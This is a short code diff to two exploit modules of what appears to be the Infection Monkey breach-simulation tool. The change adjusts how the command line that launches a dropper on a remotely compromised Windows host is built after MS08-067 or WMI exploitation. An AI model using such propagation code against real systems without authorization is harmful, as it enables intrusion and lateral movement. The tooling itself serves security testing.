diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index a372070a8..ac9f878c7 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1, self._config.dropper_target_path) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} - - cmdline += build_monkey_commandline(host, depth - 1) + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1) try: sock.send("start %s\r\n" % (cmdline, )) diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py index ab034e416..312a497da 100644 --- a/chaos_monkey/exploit/wmiexec.py +++ b/chaos_monkey/exploit/wmiexec.py @@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter): return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower() != self._config.dropper_target_path.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1, self._config.dropper_target_path) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} - - cmdline += build_monkey_commandline(host, depth - 1) + cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ + build_monkey_commandline(host, depth - 1) # execute the remote monkey result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,